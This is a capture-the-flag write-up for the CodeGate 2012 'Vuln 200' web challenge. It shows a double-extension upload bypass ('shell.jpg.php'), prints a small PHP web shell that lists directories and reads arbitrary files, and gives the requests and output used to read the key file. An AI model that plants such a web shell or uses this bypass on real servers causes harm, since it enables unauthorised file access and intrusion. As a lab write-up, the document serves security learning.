CodeGate 2012 Quals – Vuln 200

This web challenge is again about uploading.

Our aim was to get shell.

Summary: upload php shell, read the key.

We need to get a shell, so it should be a good idea to upload a php script. But there’s a check on extension!

Luckily, only a presence of “.jpg” is checked, so we can upload “shell.jpg.php” file.

Let’s upload this simple shell:

shell.jpg.php:

<?php 
if ($_GET["d"])
	print_r(scandir($_GET["d"]));
if ($_GET["f"])
	echo highlight_file($_GET["f"]);
?>

With this script we can list any directory and read any file. Let’s find the key. Usually on Win servers it’s located on the user’s Desktop:

http://1.234.41.9/1olOI01/images/c6f8…4d81.php?d=c:\users
Array ( [0] => . [1] => .. [2] => All Users [3] => Default [4] => Default User [5] => Public [6] => codegate2 [7] => desktop.ini [8] => test )

http://1.234.41.9/1olOI01/images/c6f8…4d81.php?d=c:\users\codegate2\desktop\
Array ( [0] => . [1] => .. [2] => APMSETUP Monitor.lnk [3] => Codegate 2012 Key.txt [4] => desktop.ini )

Yes, here it is:

http://1.234.41.9/1olOI01/images/c6f8…4d81.php?f=c:\users\codegate2\desktop\Codegate%202012%20Key.txt

<? 
/* 
Good Job ! 
 
Key is 16b7a4c5162d4dee6a0a6286cd475dfb 
*/ 
?> 1

The flag: 16b7a4c5162d4dee6a0a6286cd475dfb

Leave a Reply

Your email address will not be published.